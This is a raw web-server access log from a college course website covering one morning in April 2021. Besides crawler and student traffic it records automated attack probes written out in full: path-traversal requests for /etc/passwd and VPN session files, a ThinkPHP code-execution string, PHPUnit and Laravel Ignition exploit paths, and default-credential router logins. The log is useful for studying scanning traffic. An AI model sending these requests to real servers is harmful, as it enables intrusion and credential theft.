207.46.13.66 - - [30/Apr/2021:06:19:02 -0500] "GET /JimMartinson/CST2608/Schedule/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
114.119.130.251 - - [30/Apr/2021:06:20:05 -0500] "GET /JimMartinson/CST2505?Assignments HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.251 - - [30/Apr/2021:06:20:06 -0500] "GET /JimMartinson/CST2505/?Assignments HTTP/1.1" 200 7160 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
40.77.167.100 - - [30/Apr/2021:06:26:04 -0500] "GET / HTTP/1.1" 200 9868 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.100 - - [30/Apr/2021:06:31:44 -0500] "GET /Course/?Course=CST1146 HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:06:32:01 -0500] "GET /JimMartinson/CST1510/Technical%20Reference/OS%20and%20File%20System%20Content/ HTTP/1.1" 200 674 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
82.153.109.120 - - [30/Apr/2021:06:35:41 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
207.46.13.66 - - [30/Apr/2021:06:38:43 -0500] "GET /SamEspana/CST1602/CST1602-InstructionalGuide.html HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
121.189.37.58 - - [30/Apr/2021:06:39:25 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 10.0; ZumBot/1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
121.189.37.58 - - [30/Apr/2021:06:39:27 -0500] "GET / HTTP/1.1" 200 9868 "-" "Mozilla/5.0 (Windows NT 10.0; ZumBot/1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
121.189.37.58 - - [30/Apr/2021:06:39:28 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 10.0; ZumBot/1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
121.189.37.58 - - [30/Apr/2021:06:39:29 -0500] "GET / HTTP/1.1" 200 9868 "-" "Mozilla/5.0 (Windows NT 10.0; ZumBot/1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
121.189.37.58 - - [30/Apr/2021:06:39:29 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; Windows NT 6.1?; ZumBot/1.0; http://help.zum.com/inquiry)"
121.189.37.58 - - [30/Apr/2021:06:39:30 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; Windows NT 6.1?; ZumBot/1.0; http://help.zum.com/inquiry)"
34.106.50.141 - - [30/Apr/2021:06:40:54 -0500] "GET /GaryMeyer/CST1511/WKS3B.doc HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
34.106.50.141 - - [30/Apr/2021:06:40:54 -0500] "GET /GaryMeyer/CST1511/WKS3B.doc HTTP/1.1" 404 169 "http://cst.ridgewater.edu/GaryMeyer/CST1511/WKS3B.doc" "Go-http-client/1.1"
207.46.13.112 - - [30/Apr/2021:06:43:38 -0500] "GET /JimMartinson/ HTTP/1.1" 200 12187 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
194.48.199.121 - - [30/Apr/2021:06:44:34 -0500] "GET /lucee/admin/imgProcess.cfm?file=filename.cfm HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
92.118.160.61 - - [30/Apr/2021:06:44:35 -0500] "GET / HTTP/1.1" 301 185 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
92.118.160.61 - - [30/Apr/2021:06:44:36 -0500] "GET / HTTP/1.1" 200 9868 "http://134.29.175.74:80/" "Go http package"
185.191.171.37 - - [30/Apr/2021:06:45:08 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.34 - - [30/Apr/2021:06:45:08 -0500] "GET /JimMartinson/CST1025/Resources/Software/2)%20Monitoring%20Tools/ HTTP/1.1" 200 1346 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
35.185.207.84 - - [30/Apr/2021:06:48:52 -0500] "GET /JeffPolman/CST2895/CST2895%20-%20Customer%20Service%20-%20Instructional%20Guide2.2012.pdf HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
35.185.207.84 - - [30/Apr/2021:06:48:53 -0500] "GET /JeffPolman/CST2895/CST2895%20-%20Customer%20Service%20-%20Instructional%20Guide2.2012.pdf HTTP/1.1" 404 169 "http://cst.ridgewater.edu/JeffPolman/CST2895/CST2895%20-%20Customer%20Service%20-%20Instructional%20Guide2.2012.pdf" "Go-http-client/1.1"
40.77.167.70 - - [30/Apr/2021:06:49:48 -0500] "GET /JimMartinson/CST1611/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.98 - - [30/Apr/2021:06:50:21 -0500] "GET /AdobeConnect/ HTTP/1.1" 200 7978 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
45.155.205.84 - - [30/Apr/2021:06:51:53 -0500] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 9868 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:06:51:53 -0500] "POST /mifs/.;/services/LogService HTTP/1.1" 404 571 "https://134.29.175.74:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:06:51:55 -0500] "POST /api/jsonws/invoke HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:06:51:57 -0500] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 36 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:06:51:59 -0500] "GET /_ignition/execute-solution HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:06:52:00 -0500] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 9868 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:06:52:03 -0500] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:06:52:05 -0500] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:06:52:07 -0500] "GET /console/ HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.155.205.84 - - [30/Apr/2021:06:52:07 -0500] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 36 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.123.209.118 - - [30/Apr/2021:06:53:13 -0500] "GET / HTTP/1.1" 301 185 "https://nano-dent.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)"
195.123.209.118 - - [30/Apr/2021:06:53:13 -0500] "GET / HTTP/1.1" 301 185 "https://nano-dent.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)"
195.123.209.118 - - [30/Apr/2021:06:53:14 -0500] "GET / HTTP/1.1" 301 185 "https://nano-dent.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)"
114.119.148.94 - - [30/Apr/2021:06:54:18 -0500] "GET /CSTclub/index.html HTTP/1.1" 200 3450 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
172.105.89.161 - - [30/Apr/2021:07:02:49 -0500] "\xAA\xAA\xAA\xAAUUUUUUUU\xAA\xAA\xAA\xAAUUUU\xAA\xAA\xAA\xAAUUUU\xAA\xAA\xAA\xAAUUUU\xAA\xAA\xAA\xAAUUUU\xAA\xAA\xAA\xAAUUUU\xAA\xAA\xAA\xAAUUUU\xAA\xAA\xAA\xAA" 400 173 "-" "-"
207.46.13.112 - - [30/Apr/2021:07:03:00 -0500] "GET /JimMartinson/MMDT1021/InstructionalGuide/ HTTP/1.1" 200 7134 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.149 - - [30/Apr/2021:07:06:46 -0500] "GET /JimMartinson/MMDT1145/InstructionalGuide.php HTTP/1.1" 404 36 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:07:08:35 -0500] "GET /Credentials/index.cfm?Credential_ID=1156 HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.98 - - [30/Apr/2021:07:11:26 -0500] "GET /Credentials/2000-01/ HTTP/1.1" 200 1148 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:07:12:16 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6a_flash_lecture/data/_notes/ HTTP/1.1" 200 418 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
47.12.135.222 - - [30/Apr/2021:07:14:12 -0500] "GET /JimMartinson/MMDT2146/?Assignments HTTP/1.1" 200 7161 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:12 -0500] "GET /css/CST.css?datetime=20210430071412 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:12 -0500] "GET /css/debug.css?datetime=20210430071412 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:12 -0500] "GET /css/tooltip.css?datetime=20210430071412 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:12 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210430071412 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:12 -0500] "GET /js/CST.js?S&datetime=20210430071412 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:12 -0500] "GET /js/div.js?i&datetime=20210430071412 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:12 -0500] "GET /js/debug.js?e&datetime=20210430071412 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:12 -0500] "GET /js/tooltip.js?o&datetime=20210430071412 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:12 -0500] "GET /js/encode.js?n&datetime=20210430071412 HTTP/1.1" 200 2957 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:12 -0500] "GET /favicon.ico HTTP/1.1" 200 2238 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:38 -0500] "POST /Login/ HTTP/1.1" 200 388 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:38 -0500] "POST /JimMartinson/MMDT2146/?Assignments HTTP/1.1" 200 17278 "https://cst.ridgewater.edu/Login/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:39 -0500] "GET /css/CST.css?datetime=20210430071438 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:39 -0500] "GET /css/tooltip.css?datetime=20210430071438 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:39 -0500] "GET /css/debug.css?datetime=20210430071438 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:39 -0500] "GET /js/div.js?i&datetime=20210430071438 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:39 -0500] "GET /js/CST.js?S&datetime=20210430071438 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:39 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210430071438 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:39 -0500] "GET /js/tooltip.js?o&datetime=20210430071438 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:39 -0500] "GET /js/debug.js?e&datetime=20210430071438 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:39 -0500] "GET /js/select.js?e&datetime=20210430071438 HTTP/1.1" 200 1790 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
47.12.135.222 - - [30/Apr/2021:07:14:39 -0500] "GET /js/updateHTMLelement.js?p&datetime=20210430071438 HTTP/1.1" 200 6292 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/?Assignments" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
194.48.199.121 - - [30/Apr/2021:07:15:04 -0500] "GET /lucee/admin/imgProcess.cfm?file=filename.cfm HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
192.241.216.109 - - [30/Apr/2021:07:17:33 -0500] "GET /actuator/health HTTP/1.1" 404 169 "-" "Mozilla/5.0 zgrab/0.x"
185.191.171.23 - - [30/Apr/2021:07:20:00 -0500] "GET /JimMartinson/MMDT1021/Resources/Brackets/Linux/ HTTP/1.1" 200 506 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
45.155.205.165 - - [30/Apr/2021:07:25:29 -0500] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 169 "-" "python-requests/2.21.0"
45.155.205.165 - - [30/Apr/2021:07:25:30 -0500] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 400 173 "-" "-"
40.77.167.98 - - [30/Apr/2021:07:37:43 -0500] "GET /JimMartinson/CST1600/Schedule/ HTTP/1.1" 200 7100 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:07:38:00 -0500] "GET /JimMartinson/MMDT2146/Syllabus.php HTTP/1.1" 200 6471 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [30/Apr/2021:07:38:10 -0500] "GET /JimMartinson/CST1025/InstructionalGuide.php HTTP/1.1" 200 7139 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.112 - - [30/Apr/2021:07:40:05 -0500] "GET /Credentials/index.cfm?Credential_ID=963 HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.61 - - [30/Apr/2021:07:42:16 -0500] "GET /JimMartinson/CST1510/Technical%20Reference/Printers%20Content/_notes/dwsync.xml HTTP/1.1" 200 315 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
104.198.141.65 - - [30/Apr/2021:07:42:29 -0500] "GET /jeffpolman/CST1701/CST1701Syllabus.pdf HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
104.198.141.65 - - [30/Apr/2021:07:42:29 -0500] "GET /jeffpolman/CST1701/CST1701Syllabus.pdf HTTP/1.1" 404 169 "http://cst.ridgewater.edu/jeffpolman/CST1701/CST1701Syllabus.pdf" "Go-http-client/1.1"
40.77.167.70 - - [30/Apr/2021:07:45:35 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.167.70 - - [30/Apr/2021:07:45:36 -0500] "GET / HTTP/1.1" 200 9867 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
207.46.13.112 - - [30/Apr/2021:07:45:37 -0500] "GET /favicon.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
123.12.29.219 - - [30/Apr/2021:07:49:59 -0500] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 301 185 "-" "-"
40.77.167.98 - - [30/Apr/2021:07:50:24 -0500] "GET /jeffpolman/CST2840/resources/Wireless%20LAN%20Book/instructor's%20manual/ch08.doc HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
216.244.66.230 - - [30/Apr/2021:07:52:13 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.230 - - [30/Apr/2021:07:52:13 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
80.82.77.192 - - [30/Apr/2021:07:54:24 -0500] "GET / HTTP/1.1" 200 9867 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.191.171.24 - - [30/Apr/2021:07:55:38 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [30/Apr/2021:07:55:42 -0500] "GET /JimMartinson/MMDT1021/Resources/Brackets/Windows/ HTTP/1.1" 200 503 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
40.77.167.70 - - [30/Apr/2021:07:55:58 -0500] "GET /JeffPolman/CST2895/resources/ppts/Ch10-14.ppt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.88 - - [30/Apr/2021:07:58:31 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.102 - - [30/Apr/2021:07:59:09 -0500] "GET /jeffpolman/CST1701/resources/1701%20for%20students/presentations/Exploration_Routing_Chapter_4.ppt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.149 - - [30/Apr/2021:07:59:14 -0500] "GET /JimMartinson/CST1510/Technical%20Reference/System%20Buildingand%20Maintenance%20Content/_notes/ HTTP/1.1" 200 452 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
104.198.141.65 - - [30/Apr/2021:08:00:31 -0500] "GET /jeffpolman/MMDT1001/resources/presentations/Chapter09.pdf HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
104.198.141.65 - - [30/Apr/2021:08:00:31 -0500] "GET /jeffpolman/MMDT1001/resources/presentations/Chapter09.pdf HTTP/1.1" 404 169 "http://cst.ridgewater.edu/jeffpolman/MMDT1001/resources/presentations/Chapter09.pdf" "Go-http-client/1.1"
207.46.13.98 - - [30/Apr/2021:08:01:20 -0500] "GET /jeffpolman/CST2845/resources/RFID.defined.pdf HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
216.244.66.230 - - [30/Apr/2021:08:01:27 -0500] "GET /JimMartinson/CST1025/Schedule/ HTTP/1.1" 200 7102 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
34.67.170.26 - - [30/Apr/2021:08:03:43 -0500] "GET /jeffpolman/CST2702/resources/PowerPoints/Sem3Chap7/CCNA3%20Chap%207%20Study%20Questions.doc HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
34.67.170.26 - - [30/Apr/2021:08:03:44 -0500] "GET /jeffpolman/CST2702/resources/PowerPoints/Sem3Chap7/CCNA3%20Chap%207%20Study%20Questions.doc HTTP/1.1" 404 169 "http://www.cst.ridgewater.edu/jeffpolman/CST2702/resources/PowerPoints/Sem3Chap7/CCNA3%20Chap%207%20Study%20Questions.doc" "Go-http-client/1.1"
207.46.13.98 - - [30/Apr/2021:08:08:31 -0500] "GET /jeffpolman/CST2845/resources/RFID.defined.pdf HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.112 - - [30/Apr/2021:08:11:29 -0500] "GET /SamEspana/CST1602/Module-Oracle9i-16.html HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
93.174.93.76 - - [30/Apr/2021:08:12:15 -0500] "GET / HTTP/1.1" 200 9867 "https://google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
93.174.93.76 - - [30/Apr/2021:08:12:16 -0500] "GET / HTTP/1.1" 400 673 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
195.205.161.10 - - [30/Apr/2021:08:14:04 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
207.46.13.66 - - [30/Apr/2021:08:23:03 -0500] "GET /Credentials/index.cfm?Credential_ID=1493 HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
34.94.5.119 - - [30/Apr/2021:08:26:01 -0500] "GET /jeffpolman/cst1701/resources/1701%20for%20students/ELEC1701%20packet%20tracer%20Lab%20Checkoff%20sheet.doc HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
34.94.5.119 - - [30/Apr/2021:08:26:02 -0500] "GET /jeffpolman/cst1701/resources/1701%20for%20students/ELEC1701%20packet%20tracer%20Lab%20Checkoff%20sheet.doc HTTP/1.1" 404 169 "http://cst.ridgewater.edu/jeffpolman/cst1701/resources/1701%20for%20students/ELEC1701%20packet%20tracer%20Lab%20Checkoff%20sheet.doc" "Go-http-client/1.1"
40.77.167.100 - - [30/Apr/2021:08:31:46 -0500] "GET /JimMartinson/CST1025/ HTTP/1.1" 200 10220 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
